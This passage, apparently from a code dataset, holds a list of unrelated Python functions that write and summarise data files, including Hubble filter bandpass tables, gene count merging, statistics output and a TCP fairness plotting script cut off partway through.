define uvis 1 and uvis2 modes\n mode_1 = \"wfc3, uvis1, \" + filt\n mode_2 = \"wfc3, uvis2, \" + filt\n\n # pull bandpasses from stsynphot for the two uvis modes\n bp_1 = stsyn.band(mode_1)\n bp_2 = stsyn.band(mode_2)\n\n # extract the wavelength array\n wave = bp_1.waveset\n\n # compute the average bandpass between uvis1 and uvis2\n bp_avg = np.average([bp_1(wave), bp_2(wave)], axis=0)\n\n # define the filter name\n filter_name = \"HST_WFC3_\" + filt.upper()\n\n # build array of wavelength and throughput\n arr = np.array(\n list(zip(wave.value.astype(np.float64), bp_avg.astype(np.float64))),\n dtype=[(\"WAVELENGTH\", \"float64\"), (\"THROUGHPUT\", \"float64\")],\n )\n\n # append dataset to the hdf5 filters group\n f.create_dataset(filter_name, data=arr)\n\n # generate filter instance to compute relevant info\n newfilt = phot.Filter(wave, bp_avg, name=filt.upper())\n\n # populate contents lists with relevant information\n tablenames.append(filter_name)\n observatories.append(\"HST\")\n instruments.append(\"WFC3\")\n names.append(newfilt.name)\n norms.append(newfilt.norm.value)\n cwaves.append(newfilt.cl.value)\n pwaves.append(newfilt.lpivot.value)\n comments.append(\"avg of uvis1 and uvis2\")\n\n # Loop through WFC3_IR filters\n for filt in wfc3_ir:\n\n # define ir mode\n mode = \"wfc3, ir, \" + filt\n\n # pull bandpasses from stsynphot for the two uvis modes\n bp = stsyn.band(mode)\n\n # extract the wavelength array\n wave = bp.waveset\n\n # define the filter name\n filter_name = \"HST_WFC3_\" + filt.upper()\n\n # build array of wavelength and throughput\n arr = np.array(\n list(zip(wave.value.astype(np.float64), bp(wave).astype(np.float64))),\n dtype=[(\"WAVELENGTH\", \"float64\"), (\"THROUGHPUT\", \"float64\")],\n )\n\n # append dataset to the hdf5 filters group\n f.create_dataset(filter_name, data=arr)\n\n # generate filter instance to compute relevant info\n newfilt = phot.Filter(wave, bp(wave), name=filt.upper())\n\n # populate contents lists with relevant information\n tablenames.append(filter_name)\n observatories.append(\"HST\")\n instruments.append(\"WFC3\")\n names.append(newfilt.name)\n norms.append(newfilt.norm.value)\n cwaves.append(newfilt.cl.value)\n pwaves.append(newfilt.lpivot.value)\n comments.append(\"\")\n\n # Loop through WFPC2 filters\n for filt in wfpc2:\n\n # define chips 1, 2, 3, 4 modes\n mode_1 = \"wfpc2, 1, \" + filt\n mode_2 = \"wfpc2, 2, \" + filt\n mode_3 = \"wfpc2, 3, \" + filt\n mode_4 = \"wfpc2, 4, \" + filt\n\n # pull bandpasses from stsynphot for the two uvis modes\n bp_1 = stsyn.band(mode_1)\n bp_2 = stsyn.band(mode_2)\n bp_3 = stsyn.band(mode_3)\n bp_4 = stsyn.band(mode_4)\n\n # extract the wavelength array\n wave = bp_1.waveset\n\n # compute the average bandpass between uvis1 and uvis2\n bp_avg = np.average([bp_1(wave), bp_2(wave), bp_3(wave), bp_4(wave)], axis=0)\n\n # define the filter name\n filter_name = \"HST_WFPC2_\" + filt.upper()\n\n # build array of wavelength and throughput\n arr = np.array(\n list(zip(wave.value.astype(np.float64), bp_avg.astype(np.float64))),\n dtype=[(\"WAVELENGTH\", \"float64\"), (\"THROUGHPUT\", \"float64\")],\n )\n\n # append dataset to the hdf5 filters group\n f.create_dataset(filter_name, data=arr)\n\n # generate filter instance to compute relevant info\n newfilt = phot.Filter(wave, bp_avg, name=filt.upper())\n\n # populate contents lists with relevant information\n tablenames.append(filter_name)\n observatories.append(\"HST\")\n instruments.append(\"WFPC2\")\n names.append(newfilt.name)\n norms.append(newfilt.norm.value)\n cwaves.append(newfilt.cl.value)\n pwaves.append(newfilt.lpivot.value)\n comments.append(\"avg of 1, 2, 3, 4\")\n\n # Loop through ACS filters\n for filt in acs_wfc:\n\n # define wfc1, wfc2 modes\n mode_1 = \"acs, wfc1, \" + filt\n mode_2 = \"acs, wfc2, \" + filt\n\n # pull bandpasses from stsynphot for the two uvis modes\n bp_1 = stsyn.band(mode_1)\n bp_2 = stsyn.band(mode_2)\n\n # extract the wavelength array\n wave = bp_1.waveset\n\n # compute the average bandpass between uvis1 and uvis2\n bp_avg = np.average([bp_1(wave), bp_2(wave)], axis=0)\n\n # define the filter name\n filter_name = \"HST_ACS_WFC_\" + filt.upper()\n\n # build array of wavelength and throughput\n arr = np.array(\n list(zip(wave.value.astype(np.float64), bp_avg.astype(np.float64))),\n dtype=[(\"WAVELENGTH\", \"float64\"), (\"THROUGHPUT\", \"float64\")],\n )\n\n # append dataset to the hdf5 filters group\n f.create_dataset(filter_name, data=arr)\n\n # generate filter instance to compute relevant info\n newfilt = phot.Filter(wave, bp_avg, name=filt.upper())\n\n # populate contents lists with relevant information\n tablenames.append(filter_name)\n observatories.append(\"HST\")\n instruments.append(\"ACS_WFC\")\n names.append(newfilt.name)\n norms.append(newfilt.norm.value)\n cwaves.append(newfilt.cl.value)\n pwaves.append(newfilt.lpivot.value)\n comments.append(\"avg of wfc1 and wfc2\")\n\n # Loop through GALEX filters:\n for filt in galex:\n # define ir mode\n mode = \"galex,\" + filt\n\n # pull bandpasses from stsynphot for the two uvis modes\n bp = stsyn.band(mode)\n\n # extract the wavelength array\n wave = bp.waveset\n\n # define the filter name\n filter_name = \"GALEX_\" + filt.upper()\n\n # build array of wavelength and throughput\n arr = np.array(\n list(zip(wave.value.astype(np.float64), bp(wave).astype(np.float64))),\n dtype=[(\"WAVELENGTH\", \"float64\"), (\"THROUGHPUT\", \"float64\")],\n )\n\n # append dataset to the hdf5 filters group\n f.create_dataset(filter_name, data=arr)\n\n # generate filter instance to compute relevant info\n newfilt = phot.Filter(wave, bp(wave), name=filt.upper())\n\n # populate contents lists with relevant information\n tablenames.append(filter_name)\n observatories.append(\"GALEX\")\n instruments.append(\"GALEX\")\n names.append(newfilt.name)\n norms.append(newfilt.norm.value)\n cwaves.append(newfilt.cl.value)\n pwaves.append(newfilt.lpivot.value)\n comments.append(\"\")\n\n # smash the contents arrays together\n contents = np.array(\n list(\n zip(\n tablenames,\n observatories,\n instruments,\n names,\n norms,\n cwaves,\n pwaves,\n comments,\n )\n ),\n dtype=[\n (\"TABLENAME\", \"S40\"),\n (\"OBSERVATORY\", \"S30\"),\n (\"INSTRUMENT\", \"S30\"),\n (\"NAME\", \"S10\"),\n (\"NORM\", \"<f8\"),\n (\"CWAVE\", \"<f8\"),\n (\"PWAVE\", \"<f8\"),\n (\"COMMENT\", \"S100\"),\n ],\n )\n\n # add the contents array as an hd5 dataset\n hf.create_dataset(\"content\", data=contents)\n\n # close the file\n hf.close()", "def outputFiles(self, filesizelist):\n self.outputs = filesizelist\n self.outputSize = reduce(lambda x,y: x + y[1], filesizelist, 0)", "def _prepare_input_file(self, filename, numlines, maxvalue):\n with open(filename, 'a') as f:\n for _ in range(numlines):\n f.write(str(randrange(maxvalue)) + '\\n')\n self.filepath = f.name", "def make_bedfiles():\n df = pd.read_csv(\"%s.length\" % ref, sep='\\t', header=None)\n thresh = math.ceil(sum(df[1]) / globals()['jobs_per_pool'])\n lines = []\n fcount = 0\n fsum = 0\n for count,row in enumerate(df.index):\n contig, length = list(df.loc[row, :])\n fsum += length\n lines.append([contig, str(length)])\n if fsum >= thresh or count + 1 == len(df.index):\n make_bedfile(lines, fcount)\n lines = []\n fcount += 1\n fsum = 0\n return fcount", "def get_size_factor(samples, lib_file_path):\n libs = np.loadtxt(lib_file_path, dtype='str', skiprows=1, delimiter='\\t')\n a, b = np.where(samples[:, np.newaxis] == libs[:, 0])\n assert np.all(libs[b, 0] == samples)\n libs = libs[b, :]\n med = np.median(libs[:, 1].astype('float'))\n sf = med / libs[:, 1].astype('float')\n return sf", "def combine(args, library_sizes):\n with open(args.counts, \"r\") as counts, open(args.results, \"r\") as results:\n with open(args.output_dir + \"counts_results.txt\", \"w+\") as file1, \\\n open(args.output_dir + \"counts_results_rpm.txt\",\"w+\") \\\n as file2, \\\n open(args.output_dir + \"counts_results_rpkm.txt\", \"w+\") \\\n as file3:\n head = True\n for count_line, results_line in zip(counts, results):\n count_line = count_line.strip()\n results_line = results_line.strip()\n\n if head: # Process column names into one header\n head = False\n count_head_parts = count_line.split(\"\\t\")\n results_head_parts = results_line.split(\"\\t\")\n results_head_parts = [\"Chromosome\", \"Start\", \"End\"] + \\\n results_head_parts[1:]\n\n new_head_parts = results_head_parts + \\\n count_head_parts[2:]\n new_head = \"\\t\".join(new_head_parts)\n new_head += \"\\n\"\n file1.write(new_head)\n file2.write(new_head)\n file3.write(new_head)\n\n else:\n process(count_line, results_line,\n file1, file2, file3, library_sizes)", "def file_write(sp_length, sp_period, header, file_name):\n \n #specify filename and inform write\n out_file = open(file_name, \"w\")\n \n #add headers to file from list\n print(\"{0:>15}\".format(header[0]) ,\\\n \"{0:>15}\".format(header[1]) ,\\\n \"{0:>15}\".format(header[2]), file = out_file)\n \n #add data to file form lists \n for i in range(len(sp_length)):\n print(\"{0:>15}\".format(i) ,\\\n \"{0:>15.3f}\".format(sp_length[i]) ,\\\n \"{0:>15.3f}\".format(sp_period[i]), file = out_file)\n \n #close the file\n out_file.close()", "def onestatfile():\n with hp.File('StatsFile.h5', 'w') as onefile:\n alldata = np.empty((600, 4, 3, 500), dtype=np.float32)\n for j in range(600):\n for i in range(3):\n msd, vol, rms, asp = getstats(i, j+1)\n alldata[j, 0, i, :] = msd\n alldata[j, 1, i, :] = vol\n alldata[j, 2, i, :] = rms\n alldata[j, 3, i, :] = asp\n onefile.create_dataset('Stats', data=alldata, chunks=(1, 4, 3, 500),\n compression='gzip', compression_opts=9)", "def make_stats_files(sample_dc, otu_dc, degree_counts, num_con_cat, num_con,\r\n num_cat, cat_by_sample, dir_path):\r\n output = open(os.path.join(dir_path,\r\n \"stats/real_dc_sample_degree.txt\"), 'w')\r\n sample_dc_out = sorted(sample_dc.items())\r\n sample_dc_str = '\\n'.join(['\\t'.join(map(str, t)) for t in sample_dc_out])\r\n output.write(''.join([\"# Just Sample degree counts\\n\",\r\n \"Degree\tSample Count\\n\", sample_dc_str]))\r\n output.close()\r\n\r\n output = open(os.path.join(dir_path,\r\n \"stats/real_dc_otu_degree.txt\"), 'w')\r\n otu_dc_out = sorted(otu_dc.items())\r\n otu_dc_str = '\\n'.join(['\\t'.join(map(str, t)) for t in otu_dc_out])\r\n output.write(''.join([\"# Just OTU degree counts\\n\",\r\n \"Degree\tOTU Count\\n\", otu_dc_str]))\r\n output.close()\r\n\r\n output = open(os.path.join(dir_path,\r\n \"stats/real_dc_sample_otu_degree.txt\"), 'w')\r\n dc_out = sorted(degree_counts.items())\r\n dc_str = '\\n'.join(['\\t'.join(map(str, t)) for t in dc_out])\r\n output.write(''.join([\"# Sample and OTU degree counts\\n\",\r\n \"Degree\tBoth Count \\n\", dc_str]))\r\n output.close()\r\n\r\n num_pairs = len(cat_by_sample) * (len(cat_by_sample) - 1) / 2\r\n\r\n num_pairs_line = \"NUM PAIRS: %s\" % str(num_pairs)\r\n num_cat_pairs_line = \"NUM SAME CAT PAIRS: %s\"\r\n num_con_pairs_line = \"NUM CONNECTED PAIRS: %s\" % int(num_con)\r\n\r\n for cat, num in num_con_cat.items():\r\n filename = \"stats/real_cat_stats_%s.txt\" % cat\r\n output = open(os.path.join(dir_path, filename), 'w')\r\n num_neither = int((num_pairs - num_con) - (num_cat[cat] - num))\r\n stats_line = ''.join(['(', str(int(num)), ', ', str(int(num_con - num)),\r\n ', ', str(int(num_cat[cat] - num)), ', ',\r\n str(num_neither), ')'])\r\n G_stat = G_2_by_2(int(num), int(num_con - num),\r\n int(num_cat[cat] - num), num_neither)\r\n output.write(\r\n '\\n'.join([num_pairs_line,\r\n num_cat_pairs_line % num_cat[\r\n cat],\r\n num_con_pairs_line,\r\n stats_line,\r\n str(G_stat)]))\r\n output.close()", "def finalize(param, input_files='count_files'):\n\n import csv\n HELPER.writeLog('Collecting featureCount raw counts ... \\n', param)\n\n #check which of these files are actually available\n working_files = [iFile for iFile in param[input_files] if iFile != '']\n\n if len(working_files) > 0:\n #get feature ID using the first column in the first file in the list of working files\n csv_file = open(working_files[0])\n csv_reader = csv.reader(csv_file, delimiter='\\t')\n\n #For featureCount output, we want to skip the first two lines as they\n #include the featureCount call and the headers which we don't want\n next(csv_reader, None)\n next(csv_reader, None)\n\n #Now start by taking the list of identifier,\n #which is the first column in the file\n counts = [row[0] for row in csv_reader]\n csv_file.close()\n\n #get all the expression values\n header = 'ID'\n for idx in range(param['num_samples']):\n if param[input_files] != '':\n header = header+'\\t'+param['stub'][idx]\n csv_file = open(param[input_files][idx])\n csv_reader = csv.reader(csv_file, delimiter='\\t')\n\n #Here too we want to skip the first two lines, before getting the counts\n next(csv_reader, None)\n next(csv_reader, None)\n #Now start getting the counts (row[6]) and add in the ID (counts[i]) before it\n idx = 0\n for row in csv_reader:\n counts[idx] = counts[idx]+'\\t'+row[6]\n idx += 1\n csv_file.close()\n\n #output the file\n out_file = param['working_dir']+'deliverables/featureCount_raw_counts.txt'\n out_handle = open(out_file, 'w')\n out_handle.write(header+'\\n')\n\n for i in range(len(counts)):\n out_handle.write(counts[i]+'\\n')\n out_handle.close()\n\n #output_phenotype_file\n HELPER.writeLog('Writing phenotype data ... \\n', param)\n MODULE_HELPER.output_sample_info(param)\n\n #write summary stats\n #featureCount does this on its own so we can just fetch each summary file\n #check which of these files are actually available\n working_files = [iFile+'.summary' for iFile in param[input_files] if iFile != '']\n\n if len(working_files) > 0:\n #get Status column from summary file using the first column in\n #the first file in the list of working files\n csv_file = open(working_files[0])\n csv_reader = csv.reader(csv_file, delimiter='\\t')\n #Here, we want to skip the first line, as it simply points to the\n #alignment file used when running featureCount\n next(csv_reader, None)\n\n #Now start by taking the list of identifier,\n #which is the first column in the file\n entry = [row[0] for row in csv_reader]\n csv_file.close()\n\n #get all the summary stats for each sample\n header = 'Status'\n\n for idx in range(param['num_samples']):\n if param[input_files] != '':\n header = header+'\\t'+param['stub'][idx]\n #Fetch the corresponding sample's summary file\n csv_file = open(param[input_files][idx]+'.summary')\n csv_reader = csv.reader(csv_file, delimiter='\\t')\n #Again, we want to skip the first line, as it simply points\n #to the alignment file used when running featureCount\n next(csv_reader, None)\n\n #Now start getting the stats (row[1]) and add in the Status\n # (counts[i]) before it\n i = 0\n for row in csv_reader:\n entry[i] = entry[i]+'\\t'+row[1]\n i += 1\n csv_file.close()\n #output the file\n out_handle = open(param['working_dir']+\n 'results/featureCount/featureCount_stats.txt',\n 'w')\n out_handle.write(header+'\\n')\n\n for i in range(len(entry)):\n out_handle.write(entry[i]+'\\n')\n out_handle.close()\n else:\n print 'featureCount was not run successfully on any of the files..\\n'", "def WriteFileSize(self):\n # Simply a calculation of the number of clusters (e.g. sectors) * 512\n total_size = 0\n for cluster_range in self.cluster_ranges:\n clusters = cluster_range.split(\"-\")\n difference = int(clusters[1]) - int(clusters[0]) + 1\n self.cluster_list.extend(self.CreateList(int(clusters[0]), int(clusters[1])))\n print(f\"Cluster difference between {clusters[1]} and {clusters[0]} is {difference}\")\n total_size += difference*512\n print(f\"Total size has been calculated as {total_size}\")\n with open(self.output_file, \"r+b\") as fh:\n seeker = (self.root_directory_offset*self.sector_size)+((self.index_number-1)*self.directory_index_size)+(self.file_size_offset)\n #s_array = bytearray()\n print(f\"Reversing {total_size}\")\n ba_size = (total_size).to_bytes(4, byteorder='little')\n print(f\"Preparing to write {ba_size} to {seeker}\")\n fh.seek(seeker)\n fh.write(ba_size)\n print(\"File size written to root directory\")\n return True", "def generate_file(self, filename, amount):\n with open(filename, \"w\", encoding=\"utf-8\") as fi:\n count = 0\n space = \"\" if self.token is Tokenization.byte or self.token is Tokenization.character else \" \"\n for generate_token in self.generate():\n count += 1\n outputStr = str(generate_token)\n outputStr += space\n fi.write(outputStr)\n if count >= amount:\n break", "def summarize_series(fglob, outfile):\n with open(outfile, mode='w') as of:\n #Iterate over files\n flist = glob(fglob)\n flist = sorted(flist)\n lgrho = [] #list of log(rho) values, parallel to the list of rxnmap maps\n rxns = [] #list of maps of form 'rxn_name' --> energy release [erg/g/s]\n for f in flist:\n rxnmap = {}\n currxn = ''\n eps_nuc = ''\n for line in open(f,mode='r'):\n if not currxn and line.count('reaction name') == 1:\n i1 = line.index('<') + 1\n i2 = line.index('>')\n currxn = line[i1:i2]\n elif currxn and line.count('eps_nuc') == 1:\n eps_nuc = float(line.partition(':')[2].strip())\n rxnmap[currxn] = eps_nuc\n currxn = ''\n elif line.count('log rho') == 1:\n lgrho.append(line.partition('rho')[2].strip())\n srtmap = sorted(rxnmap.items(), key=operator.itemgetter(1), reverse=True) #sort on values\n rxns.append(srtmap)\n\n #Write header\n of.write('log(rho): ' + (' {:3.3s} |'*len(lgrho)).format(*lgrho) + '\\n')\n\n #Write rows of data for each logrho, include top ten rxns\n start = ' '\n for i in range(10):\n of.write(start)\n for tup in rxns:\n of.write('{:23s}'.format(tup[i][0]))\n of.write('\\n')\n of.write(start)\n for tup in rxns:\n of.write('{:<23.8e}'.format(tup[i][1]))\n of.write('\\n\\n')", "def countDataSize(self,filename):\n \n d = h5py.File(filename,'r')\n features = d['spectrometer/features'][:]\n select = self.selectData(features.astype(float), self.ifeature, d)\n N = len(features[select])\n d.close()\n\n N = (N//self.offsetLen) * self.offsetLen\n\n N = N*self.Nfeeds\n\n self.chunks += [[int(self.Nsamples), int(self.Nsamples+N)]]\n self.datasizes += [int(N/self.Nfeeds)]\n self.Nsamples += int(N)", "def main(input_filepath, output_filepath):\n logger = logging.getLogger(__name__)\n logger.info('making final data set from raw data')", "def main(input_filepath, output_filepath):\n logger = logging.getLogger(__name__)\n logger.info('making final data set from raw data')", "def generate(self, fileName):\n self.preProcess()\n styleFile = open(fileName, 'w')\n # write head part\n head = \"\"\"#!/usr/bin/env python\n\nimport os\n\nfrom WMQuality.Code import Code\n\n# output of the log files\n# prefix of the files in cvs\n# quality script for using pylint:\nqualityScript = '%s'\n# output file:\nqualityReport = '%s'\n# rating threshold (min: 0, max 10)\nthreshold = %s\n\npackages = {\\\\\n \"\"\" % (self.script, self.report, self.threshold)\n styleFile.writelines(head)\n styleFile.writelines('\\n')\n\n for moduleName in self.module.keys():\n # find the one with the most votes per module:\n # register this.\n styleFile.writelines(\" '\" + moduleName + \"':'\" + self.module[moduleName] + \"',\\\\\\n\")\n styleFile.writelines('}\\n')\n tail = \"\"\"\ncode = Code(qualityScript, qualityReport, WMCore.WMInit.getWMBASE(), threshold, packages)\ncode.run()\ncode.summaryText()\n \"\"\"\n styleFile.writelines(tail)\n styleFile.close()", "def main():\n input_file = sys.argv[1]\n target_width = int(sys.argv[2]) * 2\n\n to_write = \"\"\n \n print(\"Processing: %s\" % input_file)\n\n with open(input_file,\"r\") as fh:\n for line in fh.readlines():\n slices = line[:-1]\n \n endian_buf = []\n\n while(len(slices) > 0):\n k = slices[0:target_width]\n endian_buf.insert(0,k+\"\\n\")\n slices = slices[target_width:]\n\n for b in endian_buf:\n to_write += b\n\n with open(input_file,\"w\") as fh:\n fh.write(to_write)", "def create_con_ftst_file(con_file, model_name, fTest, outputModelFilesDirectory):\n\n evs = open(con_file, 'r').readline()\n evs = evs.rstrip('\\r\\n').split(',')\n count_ftests = 0\n\n for ev in evs:\n\n if 'f_test' in ev.lower():\n\n count_ftests += 1\n\n\n try:\n\n data = np.genfromtxt(con_file, names=True, delimiter=',', dtype=None)\n\n except:\n\n print \"Error: Could not successfully read in contrast file: \", con_file\n raise Exception\n\n\n lst = data.tolist()\n\n\n ftst = []\n contrasts = []\n contrast_names = []\n\n length = None\n length = len(list(lst[0]))\n\n\n try:\n\n for tp in lst:\n\n contrast_names.append(tp[0])\n contrasts.append(list(tp)[1:length-count_ftests])\n\n if fTest:\n ftst.append(list(tp[length-count_ftests: length]))\n\n contrasts = np.array(contrasts, dtype=np.float16)\n \n if fTest:\n fts_n = np.array(ftst)\n\n except:\n print \"\\n\\n\" + \"ERROR: Not enough contrasts for running f-tests.\" \\\n \"\\n Tip: Do you have only one contrast in your contrasts file?\" \\\n \" f-tests require more than one contrast.\" + \"\\n\" + \\\n \"Either turn off f-tests or include more contrasts.\" + \"\\n\" + \\\n \"Error name: create_fsl_model_0002\" + \"\\n\\n\"\n raise Exception\n\n\n try:\n\n f = open(os.path.join(outputModelFilesDirectory, model_name + '.con'), 'w')\n\n idx = 1\n pp_str = '/PPheights'\n re_str = '/RequiredEffect'\n for name in contrast_names:\n\n print >>f, '/ContrastName%d' %idx, '\\t', name\n pp_str += '\\t%1.5e' %(1)\n re_str += '\\t%1.5e' %(1)\n idx += 1\n\n print >>f, '/NumWaves\\t', (contrasts.shape)[1]\n print >>f, '/NumContrasts\\t', (contrasts.shape)[0]\n print >>f, pp_str\n print >>f, re_str + '\\n'\n print >>f, '/Matrix'\n \n np.savetxt(f, contrasts, fmt='%1.5e', delimiter='\\t')\n\n f.close()\n\n except:\n print \"Error: Could not create .con file.\"\n print \"\"\n raise Exception\n\n\n if fTest:\n\n try:\n\n fts_n = fts_n.T\n f = open(os.path.join(outputModelFilesDirectory, model_name + '.fts'), 'w')\n print >>f, '/NumWaves\\t%d' % (contrasts.shape)[0]\n print >>f, '/NumContrasts\\t%d\\n' % count_ftests\n\n print >>f, '/Matrix'\n\n for i in range(fts_n.shape[0]):\n print >>f, ' '.join(fts_n[i].astype('str'))\n #np.savetxt(f, fts_n[None], fmt='%d', delimiter=' ')\n f.close()\n\n except:\n print \"Error: Could not create .fts file.\"\n print \"\"\n raise Exception", "def write_out4fp(fname,specorder,nspcs,agr,nr,rmax,pairs,nperline=6):\n ndat = nr *len(pairs)\n data = np.zeros(ndat)\n n = 0\n for pair in pairs:\n isid,jsid = pair\n for i in range(nr):\n data[n] = agr[isid,jsid,i]\n n += 1\n\n with open(fname,'w') as f:\n f.write('# RDF for pairs: ')\n for pair in pairs:\n si = specorder[pair[0]-1]\n sj = specorder[pair[1]-1]\n f.write(' {0:s}-{1:s},'.format(si,sj))\n f.write('\\n')\n f.write('# rmax, nr = {0:.3f}, {1:d}\\n'.format(rmax,nr))\n f.write('#\\n')\n #...Num of data, weight for the data\n f.write(' {0:6d} {1:7.3f}\\n'.format(ndat, 1.0))\n j0 = 0\n while True:\n f.write(' '.join('{0:12.4e}'.format(data[j]) for j in range(j0,j0+nperline) if j < ndat))\n f.write('\\n')\n j0 += nperline\n if j0 >= ndat:\n break\n\n return None", "def Seperate(f_read, f_write_name):\n lines = f_read.readlines()\n line_s = [line.split() for line in lines]\n\n for i in range(6, 13):\n nbytes = pow(2,i)\n f_write = f_write_name + str(nbytes) + \"b.txt\"\n f = open(f_write, \"w+\")\n\n for line in line_s:\n if line[3] == str(nbytes):\n f.write(\" \".join(line))\n f.write(\"\\n\")\n f.close()", "def _write_example_count(count: int, output_file: str) -> Text:\n count_fname = output_file + '.num_examples.txt'\n with tf.gfile.GFile(count_fname, 'w') as count_writer:\n count_writer.write(str(count))\n return count_fname", "def spectrum_parser():\n from tools import file_importer, file_outporter\n from random import random\n # from math import log10\n \n print(\"this is spectrum parser\")\n \n relPath = \"bob/processed/OST-24-05-2017_combined.csv\"\n outPath = \"bob/processed/OST-24-05-2017_combined_no0_spectrum.csv\"\n inpF = file_importer(relPath)\n outF = file_outporter(outPath) \n headerFlag = True\n rowCount = 0\n for inpLine in inpF:\n if headerFlag: \n headerFlag = False\n spColCount = 0\n inpList = inpLine.split(\"\\t\")\n for headerI in inpList:\n if \"Peptides ST-1|Peptides ST-2|Peptides ST-3\" == headerI:\n break\n else: spColCount += 1\n outF.write(\"ID,Protein ID, Gene name,\") # write header into output file\n for headI in inpList[spColCount].split(\"|\"):\n outF.write(headI + \",\")\n for headI in inpList[spColCount + 1].split(\"|\")[:-1]:\n outF.write(headI + \",\")\n outF.write(inpList[spColCount + 1].split(\"|\")[-1] + \"\\n\")\n rowCount += 1\n continue\n \n outF.write(str(rowCount) + \",\")\n \n inpLine = inpLine.strip()\n inpItems = inpLine.split(\"\\t\")\n inpName = max(inpItems[0].split(\"|\"), key=len) # get unique protein ID\n inpGeneName = max(inpItems[6].split(\"|\"), key=len) # and gene name\n outF.write(inpName + \",\" + inpGeneName + \",\")\n \n inpSP = inpItems[spColCount].split(\"|\") + inpItems[spColCount + 1].split(\"|\") # get lfq intensity scores\n # print inpSP\n for lfqI in inpSP[:-1]: # write lfq values\n if lfqI == \"_\" or lfqI == \"0\":\n outF.write(str(random()) + \",\") ################## try with log10 values this time\n else:\n try:\n outF.write(str(lfqI) + \",\")\n except ValueError:\n print(inpItems)\n raise\n \n if inpSP[-1] == \"_\" or inpSP[-1] == \"0\": outF.write(str(random()) + \"\\n\")\n else: outF.write(inpSP[-1] + \"\\n\")\n \n \n \n rowCount += 1", "def divide_url_all():\n\tf = open(\"url_all.txt\", \"r+\")\n\turl_amount = 0\n\tfile_num = 1\n\tline = f.readline()\n\tsub_f = open(\"url_\"+str(file_num)+\".txt\", \"w+\")\n\twhile(line != \"\"):\n\t\t#print (\"line : \" + line )\n\t\turl_amount += 1\n\t\tsub_f.write(line)\n\t\tif url_amount > 33999:\n\t\t\tsub_f.close()\n\t\t\turl_amount = 0\n\t\t\tfile_num += 1\n\t\t\tsub_f = open(\"url_\"+str(file_num)+\".txt\", \"w+\")\n\t\tline = f.readline()\n\tsub_f.close()\n\treturn file_num", "def calcNumOfWrites(size, seedingFile, currentUnit):\n\tadjust = SeedFiles[seedingFile]\n\tif (currentUnit == 'gb'):\n\t\tsize = size * 1024 # convert to mb\n\tadjust = float(size) / float(adjust)\n\treturn int(math.ceil(adjust))", "def _summary(in_file):\n data = Counter()\n out_file = in_file + \"_size_stats\"\n if file_exists(out_file):\n return out_file\n with open(in_file) as in_handle:\n for line in in_handle:\n counts = int(line.strip().split(\"_x\")[1])\n line = in_handle.next()\n l = len(line.strip())\n in_handle.next()\n in_handle.next()\n data[l] += counts\n with file_transaction(out_file) as tx_out_file:\n with open(tx_out_file, 'w') as out_handle:\n for l, c in data.items():\n out_handle.write(\"%s %s\\n\" % (l, c))\n return out_file", "def test_large_file(self):\n\t\tfixedgenerator.GenerateFixedWidthFile().generate()\n\t\tmain.Main(['input/large.txt']).run()\n\t\tself.assertTrue(filecmp.cmp('output/output.csv', 'output/large.csv'))\n\t\tos.remove('input/large.txt')\n\t\tos.remove('output/large.csv')", "def make_subsample(whole_file, subsample_file):\n line_counter = 0\n with open(whole_file, 'r') as rf, open(subsample_file, 'w') as wf:\n for line_txt in rf:\n try:\n uid = json.loads(line_txt)['attributed_to']\n if uid[-1] == '0' and uid[-2] == '0': # 1/100\n wf.write(line_txt)\n except:\n print('Error parsing line_txt:', line_txt)\n line_counter += 1\n if line_counter % 10 ** 6 == 0:\n print('read %dM lines' % (line_counter // 10 ** 6))", "def create_file(destfile, size):\n fulllines = int(math.floor(size / 100.0))\n nwd = int(math.floor(math.log(fulllines+1))) + 1\n fmt = \"%{0}d \".format(nwd)\n\n with open(destfile, 'w') as fd:\n for i in range(fulllines):\n fd.write(fmt % i)\n fd.write('x' * (98-nwd))\n fd.write('\\n')\n\n left = size - (fulllines * 100)\n if left > nwd:\n fd.write(fmt % (fulllines))\n left -= nwd + 1\n if left > 1:\n fd.write('x' * (left-1))\n left = 1\n if left > 0:\n fd.write('\\n')\n\n return os.stat(destfile).st_size", "def get_library_sizes(args):\n with open(args.counts, \"r\") as counts:\n sizes = []\n head = True\n for line in counts:\n line = line.strip()\n if head:\n head = False\n samples = line.split(\"\\t\")[3:]\n total_counts = [0] * len(samples)\n else:\n counts = line.split(\"\\t\")\n if counts[1] == \"NA\":\n break\n else:\n counts = counts[3:]\n for i in range(len(counts)):\n total_counts[i] += int(counts[i])\n\n for i in range(len(samples)):\n sizes.append([samples[i], total_counts[i]])\n\n return sizes", "def main():\n\n file_name_base = \"./lab-record/result/fairness/\"\n scenarios = ['lan', 'wan1', 'wan2']\n scenario = scenarios[2]\n\n algorithms = [\"bbr\", \"scalable\", \"bic\", \"highspeed\", \"htcp\", \"hybla\",\n \"illinois\", \"vegas\", \"yeah\"]\n names = [\"BBR\", \"Scalable\", \"BIC\", \"High Speed\",\n \"H-TCP\", \"Hybla\", \"Illinois\", \"Vegas\", \"YeAH\"]\n\n test_types = [\"vs_reno\", \"vs_cubic\", \"vs_itself\"]\n\n fsize = 36\n \n index_reno = []\n index_cubic = []\n index_itself = []\n\n data = []\n \n print 'Loadint statistics for ' + file_name_base + '/' + scenario\n\n for algorithm in algorithms:\n for test in test_types:\n path_base = file_name_base + \"/\" + scenario + \"/\" + test + \"/\" + \\\n algorithm + \"/\"\n if test == \"vs_itself\":\n exp_name = names[algorithms.index(algorithm)] + \"_1\"\n con_name = names[algorithms.index(algorithm)] + \"_2\"\n print path_base + exp_name\n print path_base + con_name\n exp_filename = \"/\" + algorithm + \"_1.log\"\n con_filename = \"/\" + algorithm + \"_2.log\"\n process(path_base, exp_filename, con_filename, index_itself)\n if test == \"vs_reno\":\n exp_name = names[algorithms.index(algorithm)]\n con_name = \"Reno\"\n print path_base + exp_name\n print path_base + con_name\n exp_filename = \"/\" + algorithm + \".log\"\n con_filename = \"/reno.log\"\n process(path_base, exp_filename, con_filename, index_reno)\n if test == \"vs_cubic\":\n con_name = \"CUBIC\"\n exp_name = names[algorithms.index(algorithm)]\n print path_base + exp_name\n print path_base + con_name\n exp_filename = \"/\" + algorithm + \".log\"\n con_filename = \"/cubic.log\"\n process(path_base, exp_filename, con_filename, index_cubic)\n\n size = 9\n x = numpy.arange(size)\n\n total_width, n = 1.2, 2.5\n width = 1.0 / n\n x = x - (total_width - width) / 2\n\n for i in range(0, len(x)):\n x[i] += 0.5 * i\n\n # Exp\n fig = plt.figure()\n\n # Con\n con_reno = plt.bar(x + 0 * width - 1.2,\n index_reno,\n width=width,\n label='Against Reno',\n alpha=0.5,\n 